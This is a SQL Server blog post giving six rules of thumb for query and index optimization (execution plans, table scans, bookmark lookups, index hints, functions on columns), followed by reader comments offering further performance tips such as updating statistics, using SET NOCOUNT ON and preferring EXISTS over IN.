Pingback: SQL SERVER – Weekly Series – Memory Lane – #026 | SQL Server Journey with SQL Authority | http://blog.sqlauthority.com/2008/04/25/sql-server-optimization-rules-of-thumb-best-practices/ | CC-MAIN-2014-35 | refinedweb | 1,122 | 60.04 |
Results 1 to 1 of 1
Thread: HELP! If else statement
- Join Date
- Jul 2011
- 9
- Thanks
- 1
- Thanked 0 Times in 0 Posts
HELP! If else statement
I need to create a if else statement to check multiple model numbers (200+)... How can i build this? I basically want the user to enter their model number and if its on the list they get a approved or denied message.
So far I have this, the "if(model == 9002||1002)" doesnt seem right, it needs to basically check 200+ model numbers... am I even on the right track?
Code:
#include <iostream> using namespace std; int main(){ int model; cout << "Enter model" << endl; cin >> model; if(model == 9002||1002) { cout << "Model Approved" << endl; } else { cout << "Model Denied" << endl; } return 0; } | http://www.codingforums.com/computer-programming/294585-help-if-else-statement.html | CC-MAIN-2015-48 | refinedweb | 129 | 81.02 |
const int arrayLength = 7;
char name[arrayLength] = "Mollie";
int numVowels(0);
for (char *ptr = name; ptr < name + arrayLength; ++ptr)
{
switch (*ptr)
{
case 'A':
case 'a':
case 'E':
case 'e':
case 'I':
case 'i':
case 'O':
case 'o':
case 'U':
case 'u':
++numVowels;
}
}
cout << name << " has " << numVowels << " vowels.\n";
For this example, shouldn't the for loop termination condition be ptr < name + (arrayLength - 1)? As written, the loop also checks the null terminator of the char array. Is that necessary?
Yes, we could optimize this by adding a -1, so it doesn't check the null terminator.
Hi Alex,
What is the difference between std::endl and "\n"?
I read about it in another chapter before, but I can't find it now.
Thank you for the tutorial and the support that you provide! 🙂
Hi Santi!
When you use std::cout, the output you give it is stored in a buffer. That buffer is regularly flushed and its contents are displayed in the console. When you use '\n', the newline character is inserted into the buffer and remains there until the next flush occurs. When using std::endl, the buffer is flushed immediately and your text is displayed.
'\n' is faster than std::endl but you might not see your text right away.
If you want to print multiple lines, you can use '\n' for every but the last line and use std::endl for the last line.
#include <iostream>
int main()
{
const char *myName = "Alex";
std::cout << myName;
return 0;
}
In this, how can you initialize a pointer with a string? A pointer should be initialized with an address. Please make this clear for me.
And why do you use const here?
what would be the result without const?
"Alex" is a string literal. If myName was non-const, then you could try to modify "Alex", which will lead to undefined results. Making it const enlists the compiler's help in ensuring we don't try to modify the literal.
"Alex" is a string literal. String literals have special handling. They are stored in a special part of memory, and are given a memory address. So you can initialize a char pointer with the address of a string literal.
In this, name is an array, so why doesn't it output the address of its first element?
Because std::cout has special handling for arrays of type char* or const char* that causes them to print as C-style strings instead.
Hi Alex, when I declare a pointer such as this,
can I say that ptr is a pointer pointing to a pointer? Thanks
Also, one more question:
you put arrayLength = 7. Is that because we need one more index for '\0'? Thanks so much!
1) No. ptr is a pointer pointing to an array of 3 integers.
2) Yes, the array length needs to be large enough to hold the null terminator, otherwise crazy things will happen when we try to print the name or do anything else that is expecting the null terminator to be there.
thanks for the answer
ptr < name + arrayLength;
can you please explain me this line.
Hi, I think that means
the same thing, i.e. the address of array[0] plus arrayLength, so 7 indexes in total. I am not sure if I am right.
name is the address of the start of the array. arrayLength is the number of elements in the array. so name + arrayLength uses pointer arithmetic to find the address of the element that is just beyond the end of the array.
If ptr is initially set to name, then we can increment ptr to step through the array, and continue doing so as long as ptr < name + arrayLength. As soon as ptr == name + arrayLength, we know we've gone off the end of the array and should stop iterating.
Thank you for the reply... now I get it 🙂
Alex, can you please advise me on some online websites or books which can help me develop logical skills for programming?
Correct me if I'm wrong:
as name is char, when we increase the index by 1, we increase the address by 1.
If it was integer, we would use
ptr < name + (arrayLength*4);
You are incorrect. When you increment a pointer, it automatically scales based on the type. So incrementing an integer pointer by 1 will increase the address by 4 (assuming 32-bit integers).
Hello,
Why doesn't this work?
"No operator ">>" matches this operand:
operand types are: std::istream >> std::string"
Works fine for me on Visual Studio 2017 and on the cpp.sh online compiler. Are you including the string header?
So I was a bit confused by the switch statement, so I *think* I made it a bit more readable for some folks. Instead of declaring and initializing the ptr inside the loop, it is declared outside now, and the loop just uses int i = 0 and i < arrayLength (which equals 7). Hope this helps someone!
#include <iostream>
using namespace std;

int main()
{
const int arrayLength = 7;
char name[arrayLength] = "Mollie";
int numVowels(0);
char *ptr = name;
for (int i = 0; i < arrayLength; ++i, ++ptr)
{
switch (*ptr)
{
case 'A':
case 'a':
case 'E':
case 'e':
case 'I':
case 'i':
case 'O':
case 'o':
case 'U':
case 'u':
++numVowels;
}
}
cout << name << " has " << numVowels << " vowels.\n";
return 0;
}
The Simple Object Collaboration Framework is a simple library that makes complex interactions between objects possible by providing a new mechanism of instance discovery and lifetime management. It is an extension of the .NET CallContext or HTTPContext mechanism, which provides a way of sharing objects within an execution code path.
The OMG UML Specification defines a ‘Collaboration’ as follows:
The specification of how an operation or classifier, such as a Use Case, is realized by a set of classifiers and associations playing specific roles used in a specific way. The collaboration defines an interaction.
A diagram that shows interactions organized around the structure of a model, using either classifiers and associations or instances and links. Unlike a sequence diagram, a collaboration diagram shows the relationships among the instances. Sequence diagrams and collaboration diagrams express similar information, but show it in different ways.
UML treats collaborations as separate entities that are designed to perform a specific task, and groups them into two levels; Specification Level and Instance Level. Specification level collaboration defines a more general perspective of a repeating 'pattern' in a system. Design Patterns usually use collaboration diagrams to demonstrate the interaction between classifier roles instead of object instances. So you can just plug in the actual object instances at runtime.
Although UML collaboration diagrams are very useful, there is some important information that they don't carry. First, they don't mention how objects discover each other in order to interact, and second, they don't mention how their lifetimes are managed. A sequence diagram, on the other hand, can illustrate the flow of events along a time axis, so it shows object lifetime as well, at least for a particular operation. However, a sequence diagram still doesn't mention how lifetime management is actually achieved. With .NET garbage collection and reference tracking, it seems lifetime management is just the responsibility of the runtime. But the runtime can only act based on how you decide to reference your objects, or release them. So the lifetime management discussed in this article specifically emphasizes the responsibility assignment necessary for objects to control the lifetime of other objects.
Following is a list of instance discovery mechanisms that are currently available in .NET:
CallContext
HTTPContext.Current
There are also some derivative mechanisms like Singletons, Dependency Injection Containers, and Identity Maps. But these aren't part of the .NET framework. You can find tons of code samples around these concepts.
Each of these mechanisms of discovering object instances also has object lifetime management implications. For instance, when you use local variables, you imply that the object lifetime should be limited to the current method scope. If you use some sort of compositional model, then the assumption is that the parent (or container) is responsible for controlling the lifetimes of its children. Caching mechanisms like Session and Application cache, or static variables, imply that the object’s lifetime is controlled by the cache. Session makes sure objects live at least as long as the user is active, and the Application cache or a static variable makes sure the object lives as long as the process lives.
The following diagram shows the caching scopes provided by ASP.NET:
If you are developing complex line-of-business applications, chances are you've already used all or most of the above methods. Probably, the least known of them all are the CallContext and HTTPContext. These two provide a mechanism for creating a shared context that all objects can share during a method call (CallContext) or a single request (HTTPContext). Whatever you put into context has lifetime and instance sharing implications. Any object that you put into the HTTPContext will live at least until the current request completes, and will be accessible by any method call that is made within the current request and the current thread. CallContext is pretty much similar to HTTPContext. The main difference is that the CallContext is tied to the current thread while the HTTPContext is tied to the current HTTP request. Although ASP.NET can run one part of the code in one thread (like page init) and part of it in another (like page render), it makes sure that the HTTPContext is always properly migrated to the current thread. So, HTTPContext is much more reliable within ASP.NET than CallContext.
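As a minimal illustration of the raw mechanism (this is plain .NET Framework, not SOCF; the key name and method names below are made up for the example), data placed into CallContext by one method is visible to all of its nested calls on the same thread:

```csharp
using System;
using System.Runtime.Remoting.Messaging;

class CallContextDemo
{
    static void Main()
    {
        // Anything set here is visible to all nested calls on this thread.
        CallContext.SetData("CurrentUser", "alice");
        ProcessOrder();
    }

    static void ProcessOrder()
    {
        // No parameter passing needed; the context travels with the call.
        string user = (string)CallContext.GetData("CurrentUser");
        Console.WriteLine("Processing order for " + user);
    }
}
```

SOCF builds on exactly this kind of storage, adding scoping and lifetime control on top of it.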
When objects are instantiated and put to those call contexts, their lifetimes are limited by the call. Of course, if you have other references to an object in the context, it will outlive the context. But the point is, the lifetimes are really controllable by this mechanism without having to explicitly write code for it. Just think about what you would have to do if you were to use Session instead of HTTPContext. You would either prefer not managing the lifetime at all and keep all the objects around until the session ends, or you would have to add when you need them and remove when you want to get rid of them. This would be a manual lifetime management task, which would probably be misused or forgotten in most cases. On the other hand, HTTPContext just makes sure that you don’t even need to think about neither the lifetime nor the sharing. It magically handles it all for you.
If you aren’t still convinced that such shared and lifetime managed context mechanisms are really useful, here are some examples that you are probably using already with or without noticing that they are there:
If such contextual sharing mechanisms weren't available, what would you do? Probably, you could use method parameters, or just set properties of your objects to let them know about such information. This means you would have to write a lot of data-transfer code that does nothing but take parameters from one method and pass them to another. Either the class contract or the method contract would have to change as the system evolves, by adding more contextual information. But imagine a system with many layers and a large object model. With the availability of a call context, it is now possible to change such a system by just adding more information into the context, plus the consumer code that uses it, at any method or layer. In an ASP.NET application, you could be calling a method that makes 10 other nested calls, and you are still able to access the current transaction or the security context without having to pass those from one method to another. Isn't that nice?
We can think of many other cases where we could use such contextual sharing of objects. Here are some examples:
UserLanguage.Translate(…)
The list can go on and on. But notice that most of the cases we tend to think of are operations orthogonal to the application's main functionality. Indeed, this is a very good reason why we should prefer context objects rather than mess with the application-specific contracts. Thus, we can keep the domain object model and all contracts clean and undisturbed by these orthogonal functions. The system can evolve vertically and horizontally with the minimal possible entanglement.
Although the CallContext and HTTPContext provide a pretty good way of handling context sharing, they give us a single shared context and single scope for managing object lifetime for the whole request. In other words, once you put something into CallContext, it'll be there until the request ends. Here's a nice article if you want to learn more about CallContext and HTTPContext. If only there was a way to generalize this same idea and make it more granular, and give the programmer the ability to just start a new context and control the sharing and lifetime of such contextual information. Well, now there is such a library: SOCF.
Simple Object Collaboration Framework (SOCF) is a lightweight framework that is based on CallContext and HTTPContext, and extends the concept to control object sharing and lifetime more granularly in a hierarchical fashion. Although it is based on a very simple idea and has a very compact library, it actually could create a new style of programming on the .NET platform. This new style of programming makes it possible to start a collaboration within a using() block, and allows all nested calls to access shared data in a strongly typed fashion. Collaboration contexts of the same type can be nested. When nested, some collaboration contexts just override the parent (like validation and logging), while others (like IdentityMap) can merge their content with the parents or delegate some of their behavior to the parent. A collaboration context object and all the objects cached in it live until the using block is exited. This provides more granular and explicit control over the scope and lifetime.
Following is a diagram that shows how the proposed mechanism extends ASP.NET caching as well as the HTTPContext request scope:
The red rectangles represent the new collaboration context objects that can be organized in a hierarchical fashion depending on how they are nested within the code execution path. For ASP.NET applications and Web Services, the collaboration context objects just use the more reliable HTTPContext.
For Windows applications, the same diagram actually becomes simpler:
For Windows applications, CallContext is a reliable way to handle thread specific data.
The attached source code includes a simple library that implements various collaboration context classes (Named, Typed, Custom, IdentityMap), and some sample code that shows how to use them.
This is a class diagram of the collaboration context model implemented by the SOCF:
The attached sample code demonstrates a simple order processing system that relies on contextual object sharing to do collaboration. The simplest way to start collaboration is to just start a using block as follows:
using (var validation = new ValidationContext())
{
try
{
TestOrderConfirmation();
}
finally
{
// Dump the validation context in any case
validation.Dump();
}
}
TestOrderConfirmation performs multiple steps to process the order. Each step could be implemented in a service method, or some other handler object. The magic of collaboration context makes it possible to access the ValidationContext inside any nested call throughout the execution code path. Here's how you would access the validation context at any point in the code:
if (ValidationContext.Current != null)
{
if (order.Order_Details.Count == 0)
ValidationContext.AddError(order, "No order details!");
}
You could even call other methods that do their own validation, which should be treated entirely on their own. The collaboration context mechanism provided by SOCF ensures that there is only one current context object for a given type at any time. The last instantiated object just replaces any older instances. But, it also points back to the old instance. We'll call this old instance the super context or the parent context. If the context block shown in the example was nested within a different collaboration context of the same type, the following property would return the parent context (or super context):
ValidationContext.Current.SuperContext
Notice that the validation code within the order processing service is executed only when a ValidationContext is available. So, if you remove the using block, the system won't even do any validation. This is a good example of controlling orthogonal system behavior without having to change class contracts.
Another very common example of this kind of a context object is a logger. ASP.NET Trace behaves in a very similar fashion with the current request. However, it is only available within ASP.NET code. If you have a multi-layered architecture, you need to invent a similar mechanism. The example code actually provides one such logging context object which uses the proposed style of programming. So, you can just start a collaboration context for logging at any point in your code, like this:
using (var log = new LoggingContext())
{
try
{
TestOrderConfirmationWithAdditionalValidationContext();
// The call context will now have both logging
// and validation context, as well as the OrderConfirmation
// collaboration inside the order service.
}
finally
{
// All the logging is done so far,
// we can now check what has been written to log.
log.Dump();
}
}
And, inside any of the called methods, you can now access the logging context using:
LoggingContext.Add("Processing order");
The implementation of the LoggingContext makes sure that there is a logging context before actually processing it. So, it is up to the client to decide whether the logging should be done or not. The rest of the system doesn't have to change. And notice, this is all done without changing any class contracts, and without affecting or being affected by other running threads. All related messages will be accumulated into one log object, and later dumped to the debug window, or could be written to the standard Trace output. If you were to use the Trace output directly, all the parallel running code in other threads would put their messages into the log at arbitrary times, and you would see the result as an interwoven sequence rather than a contiguous one. The LoggingContext, on the other hand, makes sure all the messages are related to the operations of the currently executing code path and only those enclosed by the logging context.
Following is a sequence diagram that illustrates the order and life time of collaboration context objects as well as their accessibility from each method.
Blue lifelines represent method scope. The red lifelines represent collaboration contexts started by methods. Dashed arrows pointing backwards represent what a method can access (not method return). So, the method that is at the deepest level of nesting can access all collaboration contexts enclosing its call.
SOCF allows you to create your own custom collaboration entities. Here's a sample OrderConfirmation collaboration object taken from the sample code:
public class OrderConfirmation : CustomCollaboration
{
public Customer Customer { get; set; }
public Order Order { get; set; }
public IEmailService EmailService { get; set; }
public static OrderConfirmation Current
{
get { return Get<OrderConfirmation>(); }
}
}
Here’s how the class diagram for this collaboration entity looks like:
Contrary to Logging and Validation context, the OrderConfirmation represents a domain specific collaboration. So, it is not orthogonal to the tasks performed. Usually, object models contain only entities and services, but don't have higher level abstractions that are built on top of them. I think this is mostly caused by a sense of economy against class explosion. You already have a lot of entities, services, and perhaps, many other generated classes to fill your project. Don’t you? Why add more classes? But, if you think about it, the above class is actually just a contract that could be shared. So, instead of passing the same set of objects from one method to another, you could just create a class, put all the necessary objects there, and pass a single object around. That would make the code briefer, much more readable, and controllable. Of course, if you take it to an extreme, it could also be dangerous. You could just start using the same contract for every method. So, there is a tradeoff between brevity and precision. Either you'll design all your methods precisely to accept parameters that they require, or have a single object to use as a contract for a well known set of operations that usually go together. If you have a complex object model, you may prefer the latter. Effectively, what we are doing is just defining the set of objects that will contribute to a particular domain specific collaboration.
Furthermore, with the usage of a simple collaboration framework, we are now able to provide a collaboration context accessible to all the methods in the execution path. So, we don't even have to pass it as a parameter. This is pretty much similar to the ASP.NET Request or Response objects. We already know that we'll be using Request and Response during the processing of a request, so there's no point of passing the same objects to every single method in the code. These are just made available by the runtime, and your code can access them at any time, in any method. Similarly, we can do the same with OrderConfirmation, except we can also control when it starts and when it ends:
using (var orderConfirmation = new OrderConfirmation())
{
...
orderConfirmation.Order = order;
orderConfirmation.Customer = customer;
orderConfirmation.EmailService = new EmailService();
// We could also provide the email service through another
// collaboration context object. Here, we opted to make
// it part of the OrderConfirmation collaboration.
...
InitialValidate();
Calculate(); // Calculate data based on order details.
CompleteOrder(); // Complete rest of the order data.
Validate();
InsertOrder(); // Commit
SendConfirmation(); // Send a confirmation email
}
Inside the ConfirmOrder service method, the first thing we do is start a collaboration context. We then prepare the contents of the collaboration context object by setting its properties. This could also be done using the object initializer syntax of C# 3.0. After this point, we just call methods to do the processing without passing any parameters. Those methods could also be implemented by separate handler classes. The methods that perform the processing steps can easily access the order confirmation and use all the objects that contribute to the collaboration. They could even talk to each other and handle events. Imagine a transaction object in the collaboration context that can trigger events when it is committed or rolled back. Any object that is part of this collaboration could handle those events and perform extra steps based on the transaction result. In ordinary transaction handling code, objects that are used in the transaction have no idea what happens to the transaction after they are persisted. The problem is, they could have changed their state during persistence, but the transaction could have rolled back after those changes. Existing transaction mechanisms don't give code the ability to compensate for such cases. The proposed programming style can be used to give objects the ability to contribute to the handling of transactions. Following is pseudocode that shows how it would look:
SaveOrder
{
TransactionContext.Current.OnRollback +=
new EventHandler(transactionRolledBack);
...
void transactionRolledBack(object sender, EventArgs args)
{
// roll back in memory state of this object if necessary.
}
}
The SOCF library also provides a simple implementation of a generic identity map. An identity map allows you to cache objects by a key and retrieve them. An identity map pattern is usually employed for objects that are costly to initialize (like entities loaded from a database, or received from a service) and are also large in number. Generally, identity map implementations don’t care about the mentioned contextual handling of the map. The simple generic identity map provided by the SOCF is actually a custom collaboration entity that also does contextual handling.
You can start an identity map context for a type at any point in your code, and all the code that is enclosed will just be able to access objects in this local scope.
// Create a simple scope for caching product objects.
// Everything within the using() block will be able to access this map.
using (var map = new IdentityMap<Product>(IdentityMapScope.Local))
{
...
You can now use the identity map within this block and all its nested calls. To set an object by key into the identity map, use:
IdentityMap<EntityType>.Set(key, entity);
Here’s an example:
IdentityMap<Product>.Set(productID, new Product()
{ ProductID = productID, ProductName = "Product " +
productID.ToString(), UnitPrice = productID * 10 });
To get an object from the identity map:
IdentityMap<EntityType>.Get(key);
Product product = IdentityMap<Product>.Get(productID);
You can even nest such identity map blocks:
// Topmost scope
using (var map1 = new IdentityMap<Product>(IdentityMapScope.Local))
{
...
// Second level nested scope
using (var map2 = new IdentityMap<Product>(IdentityMapScope.AllParents))
{
...
The nested block could be in the same method like the one shown above, or in a nested method call. Each identity map manages its own objects, and has a lifetime controlled by its using block. When you set an object into the identity map, it’ll use the last started context to cache the object. But, when you get an object, you can decide how the identity map should search for it. This is determined by the scope parameter that you pass to the constructor called when you start the identity map. Scope = Local means that the identity map should only search for its own cached objects. Scope = Parent means that the identity map should search for its own cached objects first, but if it can’t find the object, it should continue searching its immediate parent identity map. In other words, it’ll search the identity map that encloses the current one. This is similar to class inheritance, except here, the inheritance behavior is determined by the execution path. So, the parent could be different in one method call than the other depending on how the program flows. Scope = AllParents means that the identity map should search for its own cached objects first, but if it can’t find the object, it should continue searching up the chain of parents one by one until there is no more parent, or the parent is allowed to use a local scope.
Notice that the search behavior can be determined by both the starter of the identity map and its nested identity maps. So, if you want to prevent the usage of a possibly existing parent identity map context, you can just start a new one and pass Scope = Local. Any access to this scope from this method or from nested identity maps will be restricted by the current scope.
Also note that each type has an entirely separate identity map management. So, when you nest identity maps, you don't need to consider the possible effects of identity maps of other types, because they have no effect at all.
The sample code contains a separate test class that shows examples of using the identity mapping collaboration context entity with and without nesting.
SOCF uses a provider model to abstract the access to the underlying call context technology. The default implementation just uses the Remoting CallContext class. If you want to use this library in an ASP.NET application or a Web Service project, you must make sure that the correct context provider is set. You can do this by setting a static property in the Global.asax Application_Start event:
protected void Application_Start(object sender, EventArgs e)
{
// Make sure ASP.NET specific call context
// provider is set when the application starts.
CallContextFactory.Instance =
new CallContextProviderForASPNET.CallContextProviderForASPNET();
}
This concept is very powerful, and can be used very effectively, if used properly. As with any powerful tool, you can get much more benefit than harm by recognizing the potential pitfalls.
If you use the collaboration context excessively, it will only make the system loose and fragile. Don't forget that contextual information is only available when the caller decides to provide it. So, context objects are more like optional parameters than required ones. The collaboration context approach is most useful for sharing objects that represent an orthogonal concern. This type of use is the more obvious one (logging, transactions, etc.). But it can also be used to create a common single point of access to all objects for a given task. This type of usage actually creates an implicit contract. For simple tasks that are also expected to stay simple, you are better off just using conventional ways of passing objects around. On the other hand, a collaboration context will be very useful for complex models having multiple layers, or a pipeline style of processing; it will make things simpler, keep them simpler, and also enhance extensibility. Such systems can be evolved by just adding code that starts collaborations, and code that consumes those collaborations, only at the points of interest, without touching the rest of the system.
Always remember that objects are placed into the call context for one purpose, and are available for all the nested calls, where as parameters would only be available for a particular method call. One object put into the context has a specific role, and if indirect calls to other code don’t assume this, it will probably not function correctly. This is just like having a parameter but using it for a different purpose than what it was originally intended.
Any object that you put into context will be kept alive with all of its strong references to other objects. For instance, if you have loaded a LINQ-to-SQL data object with some of its relationships, you should be aware that these related objects will also be alive as long as the object you put to session is alive. Try to keep the lifetime of such context objects as minimal as possible. In the case of IdentityMap, since the whole point is to reduce the cost of a database roundtrip or some other object initialization, you may actually want the objects around as long as possible. But still, you need to keep in mind that, not only the object but the whole object graph will be sitting in the context. In brief, you should either keep small object graphs in the context, or make sure that contexts with large object graphs have a short lifetime.
Please note that the SOCF library code has not been tested under heavy load. The purpose of this article is just to propose a new style of programming. So, if you decide to use it in a commercial project, make sure you test it thoroughly on the platform that you are developing for. Also, please don't forget to leave your feedback, whether technical or conceptual.
During my CS101 class I had the chance to meet Python. That's not completely true, since I played with it a bit before, but I had a chance to see Python in action during this course. In short, it was a really pleasant meeting and I hope it will grow into a long and mutual relationship. I will share some 'likes' and 'dislikes' in the following.
What I liked in Python...
Python is a very well known language with a great reputation and community around it. Big companies, including Google, use Python to build enterprise-level applications. Hackers love Python because it combines both simplicity and power. You can do any kind of application development, including desktop and web applications. It is compared to Ruby all the time, which for me mostly comes down to a matter of taste.
No IDE development
You don't need any kind of fancy IDE to start with Python. Sure, an IDE is something that makes development more efficient, so if you are going to do a lot of programming with Python, including debugging, you should probably pick one. But for now, I'm totally happy with Sublime Text 2 as my IDE.
Easy to learn
If you know an OO language like C++ or Java, it will be a quick jump to Python. Python is an object-oriented language, but with support for different paradigms such as procedural and even functional programming. The basic concepts of variables, conditions, and control flow are the same as the ones you are used to. Of course, you spend some time learning the fundamentals -- how to compare things, how to calculate the length of a string or list, how to put an element into a dictionary. Sometimes I still refer to the documentation, but in general all those things are easy to remember with practice.
Interpretation and dynamic typing
Python is interpreted. You never mention the type of an object as you declare it or use it. You might apply different operations to an object; they are evaluated at runtime. There are different opinions (holy wars) on static vs. dynamic typing, but for me, with dynamic languages the overall development velocity is higher. First of all, you don't spend any time on compilation, which in the case of big solutions could be really long. Second, since you are only able to check results as the code is executed (even if you just misspell a variable name, you will only find out when that code section is evaluated), you are more focused on unit tests and TDD to catch obvious issues, which in general makes development faster.
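As a quick illustration (the function and names here are my own, in modern Python 3 syntax, not from the course), a typo inside a function body goes completely unnoticed until that line actually executes:

```python
def greet(name):
    # The typo below ('nam' instead of 'name') is not detected when the
    # function is defined -- only when this line actually runs.
    return "Hello, " + nam

# Defining greet() succeeded; the problem surfaces only on execution.
try:
    greet("Python")
except NameError as e:
    print("Caught at runtime:", e)
```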
Built in types
Python has a complete built-in type system. For numbers you can use different types, such as int, float, long, and complex. The type is evaluated at runtime,
i = 0 # integer
j = 1.0 # float
x = complex(1, -1) # complex
Strings are everything inside quotes,
str = "I'm string"
By the way, during the course I came to the conclusion that the list is the most flexible data structure. Everything you need, you can build upon lists. Lists are handled nicely in Python,
l = [ 1, 2, 'three', [4, 5], [[6, 7], 8] ]
Lists are non-optimal for searches, so if you do a lot of lookups you might consider using a dictionary,
d = { 'one': 1, 'two': 2, 'three': [3] }
Each type has its own set of methods. Strings include common operations such as concatenation, trimming, substring search, and so on. For lists and dictionaries there is a bunch of useful stuff such as getting iterators and pushing and popping elements.
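A few of those operations, as a quick sketch (the values here are my own examples, in Python 3 syntax):

```python
s = "  brew how  "
print(s.strip())              # trimming: 'brew how'
print("brew how".find("how")) # substring search: 5

l = [1, 2]
l.append(3)                   # push an element onto the list
print(l.pop())                # pop it back off: 3

d = {'one': 1, 'two': 2}
print(sorted(d.keys()))       # iterate over keys: ['one', 'two']
```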
Syntax and Code styles
Syntax and code style are commonly another topic of holy war. Fortunately, Python leaves very little room for that. First of all -- no semicolons. Second, Python uses indentation as part of the language syntax, so poorly indented code simply won't work.
Basically, everything that comes after ":" has to be indented. This applies to if, while, for, and so on. Using indentation instead of curly braces (or any other symbol or term) is a really nice idea, keeping code in the same format and 'forcing' one solid set of code guidelines across projects and teams.
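For example (my own toy function, in Python 3 syntax), the block structure below is defined entirely by the colon and the indentation that follows it:

```python
def classify(n):
    if n % 2 == 0:      # the indented lines form the 'if' block
        kind = "even"
    else:
        kind = "odd"
    return kind         # dedenting back out ends the blocks

for i in range(3):      # the same rule applies to loops
    print(classify(i))  # prints: even, odd, even
```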
What I disliked in Python...
There are no perfect things, much less perfect languages. Developers have their own habits and opinions on different things. In Python, I see several things that make me a little uncomfortable.
Naming consistency
It sounds like Python adopts C code style for naming methods and variables, like longest_cycle or def make_it_work(). But in reality a lot of methods violate those rules, for instance some methods of the dictionary type: fromkeys(), iteritems(), setdefault(). At the same time, dict contains the method has_key().
That's very annoying. Especially if you don't have an IDE with name suggestions, it makes them really hard to remember.
Booleans and None
Almost the same as the topic above. Having chosen C style (with a lowercase first letter), the language designers decided to make some special cases.
a = True # why not true ?
b = False # why not false ?
x = None # none ?
So, in code which is in general lowercase, those True/False/None look really strange.
def proc3(input_list):
    if len(input_list) == 0:
        return None
    for i in range(0, len(input_list)):
        for j in range(0, len(input_list)):
            if input_list[i] == input_list[j] and i != j:
                return False
    return True
OO but not OO
Being an OO language, Python still relies on some procedural concepts. A good example is calculating the length of a string. I would expect the string to have a corresponding method, len() or something, but instead we have a 'global' function that does it.
s = "I'm string"
print len(s) # why not s.len() ?
len() is overloaded for other types; it works for lists and dictionaries as well,
l = [1, 2, 3]
d = { 1: 1, 2: 2, 3: 3 }
print len(l)
print len(d)
In the same manner, if you want to get a reverse iterator for a collection, I would assume there is a corresponding method that returns that iterator. Bad guess,
l = [1, 2, 3]
for e in reversed(l): # why not l.reverse() ?
    print e
__init__() method
When trying out classes in Python, the first thing you need to understand is how to construct an object. Python has a constructor that looks like this,
class MyClass:
    def __init__(self, a, b):
        self.a = a
        self.b = b
I could understand it being init or _init or constructor, but I will probably never understand __init__ with two underscores before and after. It's ugly.
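Ugly as it is, the double-underscore method is what runs when you instantiate the class (the class is repeated here so the snippet is self-contained, in Python 3 syntax):

```python
class MyClass:
    def __init__(self, a, b):
        self.a = a
        self.b = b

obj = MyClass(1, 2)  # __init__ is invoked implicitly here
print(obj.a, obj.b)  # 1 2
```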
Conclusion
I'm about to enroll in the next Udacity courses, so my Python journey continues. I hope to get deeper into the language and the standard library.
ASP.NET MVC 4 Mobile App Development
Create next-generation applications for smart phones, tablets, and mobile devices using the ASP.NET MVC development framework.
As the lines between web apps and traditional desktop apps blur, our users have come to expect real-time behavior in our web apps—something that is traditionally the domain of the desktop. One cannot really blame them. Real-time interaction with data, services, and even other users has driven the connected revolution, and we are now connected in more ways than ever before. However valid this desire to be always connected and immediately informed of an event, there are inherent challenges in real-time interactions within web apps.
The first challenge is that the Web is stateless. The Web is built on HTTP, a protocol that is request/response; for each request a browser makes, there is one and only one response. There are frameworks and techniques we can use to mask the statelessness of the Web, but there is no true state built into the Web or HTTP.
This is further complicated as the Web is client/server. As it's stateless, a server only knows of the clients connected at any one given moment, and clients can only display data to the user based upon the last interaction with the server. The only time the client and server have any knowledge of the other is during an active request/response, and this action may change the state of the client or the server. Any change to the server's state is not reflected to the other clients until they connect to the server with a new request. It's somewhat like the uncertainty principle in that the more one tries to pin down one data point of the relationship, the more uncertain one becomes about the other points.
All hope is not lost. There are several techniques that can be used to enable real-time (or near real-time) data exchange between the web server and any active client.
Simulating a connected state
In traditional web development, there has not been a way to maintain a persistent connection between a client browser and the web server. Web developers have gone to great lengths to try and simulate a connected world in the request/response world of HTTP.
Several developers have met with success using creative thinking and loopholes within the standard itself to develop techniques such as long polling and the forever frame. Now, thanks to the realization that such a technique is needed, the organizations overseeing the next generation of web standards are also heeding the call with server-sent events and web sockets.
Long polling
Long polling is the default fallback for any client and server content exchange. It is not reliant on anything but HTTP—no special standards checklists or other chicanery are required.
Long polling is like getting the silent treatment from your partner. You ask a question and you wait indefinitely for an answer. After some known period of time and what may seem like an eternity, you finally receive an answer or the request eventually times out. The process repeats again and again until the request is fully satisfied or the relationship terminates. So, yeah, it's exactly like the silent treatment.
Forever Frame
The Forever Frame technique relies on the HTTP 1.1 standard and a hidden iframe. When the page loads, it contains (or constructs) a hidden iframe used to make a request back to the server. The actual exchange between the client and the server leverages a feature of HTTP 1.1 known as Chunked Encoding. Chunked Encoding is identified by a value of chunked in the HTTP Transfer-Encoding header.
This method of data transfer is intended to allow the server to begin sending portions of data to the client before the entire length of the content is known. When simulating a real-time connection between a browser and web server, the server can dispatch messages to the client as individual chunks on the request made by the iframe.
Server-Sent Events
Server-Sent Events (SSE) provide a mechanism for a server to raise DOM events within a client web browser. This means to use SSE, the browser must support it. As of this writing, support for SSE is minimal but it has been submitted to W3C for inclusion into the HTML5 specification.
The use of SSE begins by declaring an EventSource variable:
var source = new EventSource('/my-data-source');
If you then want to listen to any and all messages sent by the source, you simply treat it as a DOM event and handle it in JavaScript.
source.onmessage = function(event) {
// Process the event.
}
SSE supports the raising of specific named events and complex event messaging. The message format is a simple line-based text format. Two newline characters separate each message within the stream, and each message may carry an id, data, and event field. SSE also supports setting the retry time using the retry keyword within a message.
:comment
:simple message
data:"this string is my message"
:complex message targeting an event
event:thatjusthappened
data:{ "who":"Professor Plum", "where":"Library", "with":"candlestick"
}
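To make that field layout concrete, here is a minimal sketch (my own helper function, not part of any library) that splits a raw SSE stream into messages and fields:

```javascript
// Parse a raw SSE stream: messages are separated by a blank line,
// each "field:value" line sets a field on the message, and lines
// starting with ":" are comments and are ignored.
function parseSSE(stream) {
  return stream.split("\n\n")
    .map(function (chunk) {
      var msg = {};
      chunk.split("\n").forEach(function (line) {
        if (line === "" || line.charAt(0) === ":") return; // skip comments
        var idx = line.indexOf(":");
        msg[line.slice(0, idx)] = line.slice(idx + 1);
      });
      return msg;
    })
    .filter(function (msg) { return Object.keys(msg).length > 0; });
}

var raw = ':comment\ndata:"this string is my message"\n\n' +
          'event:thatjusthappened\ndata:{"who":"Professor Plum"}';
var messages = parseSSE(raw);
console.log(messages[0].data);   // "this string is my message" (quotes included)
console.log(messages[1].event);  // thatjusthappened
```

Note that a real EventSource handles this parsing for you; the sketch only illustrates the wire format.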
As of this writing, SSE is not supported in Internet Explorer and is partially implemented in a few mobile browsers.
WebSockets
The coup de grâce of real-time communication on the Web is WebSockets. WebSockets support a bidirectional stream between a web browser and web server and only leverage HTTP 1.1 to request a connection upgrade.
